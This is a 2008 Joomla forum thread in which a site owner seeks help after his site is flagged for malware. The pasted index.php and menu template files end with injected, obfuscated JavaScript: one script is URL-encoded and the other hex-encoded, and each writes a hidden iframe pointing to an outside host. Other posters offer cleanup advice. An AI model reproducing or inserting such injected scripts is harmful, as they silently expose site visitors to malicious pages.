test

my site is in crisis. someone plz help!

Forums    Public Forums    General Questions    my site is in crisis. someone plz help!
Viewing 14 posts - 1 through 14 (of 14 total)
  • Author
    Posts
  • Sam Kanj Friend
    July 28, 2008 at 11:32 am #131437

    my site is http://www.superb.com.au/index.php

    I am currently building the new site in the root directory but i also have the existing site present which points to the index.html

    I tried to access the site the other day andrealised it was blank. I did nothing to the index.php and at times I would receive an error such as restricted access, and another time it said syntax error on index.php line 89.

    Also google sent us an email stating that the site had malicious software or malware and now they have indexed it as a warning in google. I also noticed in the publichtml/index.php file there were some weird letters if you scroll down to the end of the file.

    Can someone please help.

    Menalto Friend
    July 28, 2008 at 11:41 am #262701

    What is the weird letters you see?
    Which template are you using?

    questbg Friend
    July 28, 2008 at 11:45 am #262702

    Think this is really dangerous … mixing a index.html and an index.php file in the same root directory. Surely best to stick all Joomla test site in a subdirectory until fully tested, then replace the static .html site when ready?

    Sam Kanj Friend
    July 28, 2008 at 11:57 am #262704

    To be honest i am not aware of its dangers, I was told it can be done and it would be easier than to transfer everything. Thanks menalto for the quick response, I am using the JA Helio template. As for those weird numbers and letters i actually deleted them and that actually made the site pop back up again, but obvioulsy now that didnt work. here is what the index.php looks like currently

    <?php
    /**
    * @version $Id: index.php 9987 2008-02-05 17:43:24Z ian $
    * @package Joomla
    * @copyright Copyright (C) 2005 – 2008 Open Source Matters. All rights reserved.
    * @license GNU/GPL, see LICENSE.php
    * Joomla! is free software. This version may have been modified pursuant
    * to the GNU General Public License, and as distributed it includes or
    * is derivative of works licensed under the GNU General Public License or
    * other free or open source software licenses.
    * See COPYRIGHT.php for copyright notices and details.
    */

    // Set flag that this is a parent file
    define( ‘_JEXEC’, 1 );

    define(‘JPATH_BASE’, dirname(__FILE__) );

    define( ‘DS’, DIRECTORY_SEPARATOR );

    require_once ( JPATH_BASE .DS.’includes’.DS.’defines.php’ );
    require_once ( JPATH_BASE .DS.’includes’.DS.’framework.php’ );

    JDEBUG ? $_PROFILER->mark( ‘afterLoad’ ) : null;

    /**
    * CREATE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe =& JFactory::getApplication(‘site’);

    /**
    * INITIALISE THE APPLICATION
    *
    * NOTE :
    */
    // set the language
    $mainframe->initialise();

    JPluginHelper::importPlugin(‘system’);

    // trigger the onAfterInitialise events
    JDEBUG ? $_PROFILER->mark(‘afterInitialise’) : null;
    $mainframe->triggerEvent(‘onAfterInitialise’);

    /**
    * ROUTE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->route();

    // authorization
    $Itemid = JRequest::getInt( ‘Itemid’);
    $mainframe->authorize($Itemid);

    // trigger the onAfterRoute events
    JDEBUG ? $_PROFILER->mark(‘afterRoute’) : null;
    $mainframe->triggerEvent(‘onAfterRoute’);

    /**
    * DISPATCH THE APPLICATION
    *
    * NOTE :
    */
    $option = JRequest::getCmd(‘option’);
    $mainframe->dispatch($option);

    // trigger the onAfterDispatch events
    JDEBUG ? $_PROFILER->mark(‘afterDispatch’) : null;
    $mainframe->triggerEvent(‘onAfterDispatch’);

    /**
    * RENDER THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->render();

    // trigger the onAfterRender events
    JDEBUG ? $_PROFILER->mark(‘afterRender’) : null;
    $mainframe->triggerEvent(‘onAfterRender’);

    /**
    * RETURN THE RESPONSE
    */
    echo JResponse::toString($mainframe->getCfg(‘gzip’));

    Menalto Friend
    July 28, 2008 at 2:39 pm #262722

    Actually that index.php is core joomla and not template index.php. So if you remember the code you removed it would be good to know?
    Did you add them or was it like that when you installed it? Was it a quickstart package or a joomla installation from joomla.org?
    But still when entering your site on http://www.superb.com.au/index.php i get a blank page?

    Anyway, if you have installed joomla in root of your site while working on it, its no problems as long as no other file names/directories conflicts with joomla and vice versa.
    But to be on the safe side, transfer it to a subfolder while working on it and keep the site offline so only you have access to it.
    How far have you come on your site now btw?

    Sam Kanj Friend
    July 28, 2008 at 3:09 pm #262727

    Im not really sure what the code was that I deleted and where it came from. All I Know is that it was at least 10 lines of jumbled letters and numbers that just appeared. If you type in superb in google it says this site may be infected. But I believe I probably ruined it by overwriting the template index.php with the core index.php. So what I tried now was take the original template index.php and overwrite the existing one. I get this error now;

    Parse error: syntax error, unexpected ‘<‘ in /home/sup49728/public_html/modules/mod_mainmenu/tmpl/default.php on line 82

    The installation that I did was a quickstart.

    Sam Kanj Friend
    July 28, 2008 at 3:18 pm #262730

    I just noticed this error on the page so I went to this file called default.php and this is what it looks like

    Parse error: syntax error, unexpected ‘<‘ in /home/sup49728/public_html/modules/mod_mainmenu/tmpl/default.php on line 82

    <?php

    // no direct access
    defined(‘_JEXEC’) or die(‘Restricted access’);

    if ( ! defined(‘modMainMenuXMLCallbackDefined’) )
    {
    function modMainMenuXMLCallback(&$node, $args)
    {
    $user = &JFactory::getUser();
    $menu = &JSite::getMenu();
    $active = $menu->getActive();
    $path = isset($active) ? array_reverse($active->tree) : null;

    if (($args[‘end’]) && ($node->attributes(‘level’) >= $args[‘end’]))
    {
    $children = $node->children();
    foreach ($node->children() as $child)
    {
    if ($child->name() == ‘ul’) {
    $node->removeChild($child);
    }
    }
    }

    if ($node->name() == ‘ul’) {
    foreach ($node->children() as $child)
    {
    if ($child->attributes(‘access’) > $user->get(‘aid’, 0)) {
    $node->removeChild($child);
    }
    }
    }

    if (($node->name() == ‘li’) && isset($node->ul)) {
    $node->addAttribute(‘class’, ‘parent’);
    }

    if (isset($path) && in_array($node->attributes(‘id’), $path))
    {
    if ($node->attributes(‘class’)) {
    $node->addAttribute(‘class’, $node->attributes(‘class’).’ active’);
    } else {
    $node->addAttribute(‘class’, ‘active’);
    }
    }
    else
    {
    if (isset($args[‘children’]) && !$args[‘children’])
    {
    $children = $node->children();
    foreach ($node->children() as $child)
    {
    if ($child->name() == ‘ul’) {
    $node->removeChild($child);
    }
    }
    }
    }

    if (($node->name() == ‘li’) && ($id = $node->attributes(‘id’))) {
    if ($node->attributes(‘class’)) {
    $node->addAttribute(‘class’, $node->attributes(‘class’).’ item’.$id);
    } else {
    $node->addAttribute(‘class’, ‘item’.$id);
    }
    }

    if (isset($path) && $node->attributes(‘id’) == $path[0]) {
    $node->addAttribute(‘id’, ‘current’);
    } else {
    $node->removeAttribute(‘id’);
    }
    $node->removeAttribute(‘level’);
    $node->removeAttribute(‘access’);
    }
    define(‘modMainMenuXMLCallbackDefined’, true);
    }

    modMainMenuHelper::render($params, ‘modMainMenuXMLCallback’);
    <script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%65%30%63%35%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6b%61%72%61%62%6f%6b%2e%62%69%7a%2f%73%70%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%39%35%34%35%29%2b%27%39%38%38%64%36%38%32%38%61%5c%27%20%77%69%64%74%68%3d%33%36%37%20%68%65%69%67%68%74%3d%31%33%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29”)); </script>

    Sam Kanj Friend
    July 28, 2008 at 3:23 pm #262732

    I simply transfered the original default.php file and overwrote this and the site seems to be working. But the problem is that I’ve done that already before with the index.php but the code that appears at the bottom of the file seems to be infecting other php files. Never seen this before. your input is greatly appreciated

    Menalto Friend
    July 28, 2008 at 6:48 pm #262745

    Did you add the code or was it like that when you installed it? Was it a quickstart package or a joomla installation from joomla.org?

    Sam Kanj Friend
    July 28, 2008 at 10:57 pm #262759

    No I didnt add the code, I just appeared there when I realised I had problems with the site.

    It was a quickstart installation.

    Sam Kanj Friend
    July 28, 2008 at 11:11 pm #262760

    there you go it happened again.

    here is the publichtml/index.php Once again this code pops up on its own.

    <?php
    /**
    * @version $Id: index.php 9987 2008-02-05 17:43:24Z ian $
    * @package Joomla
    * @copyright Copyright (C) 2005 – 2008 Open Source Matters. All rights reserved.
    * @license GNU/GPL, see LICENSE.php
    * Joomla! is free software. This version may have been modified pursuant
    * to the GNU General Public License, and as distributed it includes or
    * is derivative of works licensed under the GNU General Public License or
    * other free or open source software licenses.
    * See COPYRIGHT.php for copyright notices and details.
    */

    // Set flag that this is a parent file
    define( ‘_JEXEC’, 1 );

    define(‘JPATH_BASE’, dirname(__FILE__) );

    define( ‘DS’, DIRECTORY_SEPARATOR );

    require_once ( JPATH_BASE .DS.’includes’.DS.’defines.php’ );
    require_once ( JPATH_BASE .DS.’includes’.DS.’framework.php’ );

    JDEBUG ? $_PROFILER->mark( ‘afterLoad’ ) : null;

    /**
    * CREATE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe =& JFactory::getApplication(‘site’);

    /**
    * INITIALISE THE APPLICATION
    *
    * NOTE :
    */
    // set the language
    $mainframe->initialise();

    JPluginHelper::importPlugin(‘system’);

    // trigger the onAfterInitialise events
    JDEBUG ? $_PROFILER->mark(‘afterInitialise’) : null;
    $mainframe->triggerEvent(‘onAfterInitialise’);

    /**
    * ROUTE THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->route();

    // authorization
    $Itemid = JRequest::getInt( ‘Itemid’);
    $mainframe->authorize($Itemid);

    // trigger the onAfterRoute events
    JDEBUG ? $_PROFILER->mark(‘afterRoute’) : null;
    $mainframe->triggerEvent(‘onAfterRoute’);

    /**
    * DISPATCH THE APPLICATION
    *
    * NOTE :
    */
    $option = JRequest::getCmd(‘option’);
    $mainframe->dispatch($option);

    // trigger the onAfterDispatch events
    JDEBUG ? $_PROFILER->mark(‘afterDispatch’) : null;
    $mainframe->triggerEvent(‘onAfterDispatch’);

    /**
    * RENDER THE APPLICATION
    *
    * NOTE :
    */
    $mainframe->render();

    // trigger the onAfterRender events
    JDEBUG ? $_PROFILER->mark(‘afterRender’) : null;
    $mainframe->triggerEvent(‘onAfterRender’);

    /**
    * RETURN THE RESPONSE
    */
    echo JResponse::toString($mainframe->getCfg(‘gzip’));
    <script>
    <!–
    var d=document,kol=561;
    function O10H488E1FE154FC5(H488E1FE155643){ function H488E1FE155E38() {return 16;} return( parseInt(H488E1FE155643,H488E1FE155E38()));}function H488E1FE156E41(H488E1FE157636){ function H488E1FE158E20() {var H488E1FE15921D=2;return H488E1FE15921D;} var H488E1FE157E2F=”;for(H488E1FE158627=0; H488E1FE158627<H488E1FE157636.length; H488E1FE158627+=H488E1FE158E20()){ H488E1FE157E2F += ( String.fromCharCode (O10H488E1FE154FC5(H488E1FE157636.substr(H488E1FE158627, H488E1FE158E20()))));}return H488E1FE157E2F;} document.write(H488E1FE156E41(‘3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3638343034292B27623434335C272077696474683D333439206865696768743D313936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E’));
    //–>
    </script>

    Menalto Friend
    July 29, 2008 at 5:07 am #262823

    I would contact my host and ask them if they could check the security on the server, then i would check all file permissions on my site. Change all passwords in your account(joomla,cpanel,database etc)
    If your site dont have much content/changes yet i suggest a fresh reinstall after you have done the above.

    Sam Kanj Friend
    July 29, 2008 at 5:14 am #262825

    i will do that menalto thanks, i tried something else. I dida fresh install through cpanel http://www.superb.com.au/newsite, for a while it was fie, then i refreshed the page and i got the same problem.
    I;m going to give them a call and do what you mentioned ill let you kknow how it goes

    Sam Kanj Friend
    July 29, 2008 at 5:20 am #262826

    i wanted to know what would be the safest file permission?

  • Author
    Posts
Viewing 14 posts - 1 through 14 (of 14 total)

This topic contains 14 replies, has 3 voices, and was last updated by  Sam Kanj 16 years, 4 months ago.

We moved to new unified forum. Please post all new support queries in our New Forum

Important Notice :

New Unified Portal is live

Must Read

Jump to forum

Categories